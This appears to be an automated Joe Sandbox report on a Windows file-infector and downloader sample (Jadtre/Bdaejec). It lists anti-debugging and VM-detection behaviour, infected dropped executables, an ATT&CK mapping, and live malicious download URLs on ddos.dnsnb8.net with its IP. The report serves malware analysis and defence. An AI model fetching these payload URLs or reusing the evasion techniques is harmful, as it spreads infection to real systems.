Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-1054

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-7022

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Code function: 1_2_00C51718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00C51754h

1_2_00C51718

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Code function: 1_2_00C529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00C529E2

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Code function: 1_2_00C52B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00C52B8C

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000003.2045756473.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW=
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

API call chain: ExitProcess graph end node

graph_1-1029

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

Code function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00401EE2

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

0_2_00409607

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

Code function: 0_2_00414044 mov eax, dword ptr fs:[00000030h]

0_2_00414044

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

Code function: 0_2_0040CD6B CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_0040CD6B

Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Code function: 0_2_00409867 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	0_2_00409867
Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Code function: 0_2_00406000 SetUnhandledExceptionFilter,	0_2_00406000
Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Code function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00401EE2
Source: C:\Users\user\Desktop\yRc7UfFif9.exe	Code function: 0_2_004035C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004035C0

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

Code function: GetLocaleInfoA,

0_2_0040A82A

Source: C:\Users\user\Desktop\yRc7UfFif9.exe

Code function: 0_2_00406507 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00406507

Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Code function: 1_2_00C5139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_00C5139F

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: sgKbPm.exe PID: 7164, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: sgKbPm.exe PID: 7164, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Native API	Boot or Logon Initialization Scripts	2 Process Injection	1 Access Token Manipulation	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	2 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
yRc7UfFif9.exe	97%	ReversingLabs	Win32.Virus.Jadtre
yRc7UfFif9.exe	88%	Virustotal		Browse
yRc7UfFif9.exe	100%	Avira	W32/Jadtre.B
yRc7UfFif9.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\sgKbPm.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\sgKbPm.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\sgKbPm.exe	97%	ReversingLabs	Win32.Trojan.Skeeyah

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar_	100%	Avira URL Cloud	malware
http://www.activestate.com	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rar9	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarp	100%	Avira URL Cloud	malware
http://www.activestate.comHolger	0%	Avira URL Cloud	safe
http://www.scintilla.org/scite.rng	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	Avira URL Cloud	malware
http://www.rftp.comJosiah	0%	Avira URL Cloud	safe
http://www.rftp.com	0%	Avira URL Cloud	safe
http://www.scintilla.org	0%	Avira URL Cloud	safe
http://www.baanboard.comBrendon	0%	Avira URL Cloud	safe
https://www.smartsharesystems.com/	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarB	100%	Avira URL Cloud	malware
http://www.spaceblue.comMathias	0%	Avira URL Cloud	safe
http://www.develop.com	0%	Avira URL Cloud	safe
http://www.lua.org	0%	Avira URL Cloud	safe
https://www.smartsharesystems.com/Morten	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarB	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net/	100%	Avira URL Cloud	malware
http://www.spaceblue.com	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarH	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarI	100%	Avira URL Cloud	malware
http://www.baanboard.com	0%	Avira URL Cloud	safe
http://www.develop.comDeepak	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarn	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rar	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.scintilla.org/scite.rng	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar9	sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar_	sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.rftp.comJosiah	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.activestate.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.activestate.comHolger	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	sgKbPm.exe, 00000001.00000003.2022814417.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.1.dr	false		high
http://www.rftp.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarp	sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.baanboard.comBrendon	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarB	sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.develop.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.lua.org	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarB	sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net/	sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.spaceblue.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarH	sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarI	sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarn	sgKbPm.exe, 00000001.00000003.2045756473.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.baanboard.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581653
Start date and time:	2024-12-28 12:24:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yRc7UfFif9.exe renamed because original name is a hash value
Original Sample Name:	2024-12-28_7acf6527ef4bef7f7325a94c4d92c1f9.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@5/11@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 19 Number of non-executed functions: 22
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94, 40.126.53.21, 4.175.87.197, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:25:37	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/xoqfqirqhp
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	npukfztj.biz/edmrjb
	http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com	Get hash	malicious	Unknown	Browse	setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/eglmpsrvxnyx
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/peioi
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	npukfztj.biz/cbecuogqej
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	saytjshyf.biz/bkq
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	jhvzpcfg.biz/tgcwttfqletfhyq
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	hehckyov.biz/ircdert

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse	44.221.84.105
	ib.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	1hdqYXYJkr.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(193).exe	Get hash	malicious	Bdaejec, Stealc	Browse	44.221.84.105
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	FIyDwZM4OR.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	HGFSqmKwd5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	A3nofpjN9A.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	34.226.108.155

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\sgKbPm.exe	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse
	ib.exe	Get hash	malicious	Bdaejec	Browse
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse
	8VB4lVuZk3.exe	Get hash	malicious	Bdaejec	Browse
	biKy3nZEyJ.exe	Get hash	malicious	Bdaejec	Browse
	biKy3nZEyJ.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\sgKbPm.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590637569763815
Encrypted:	false
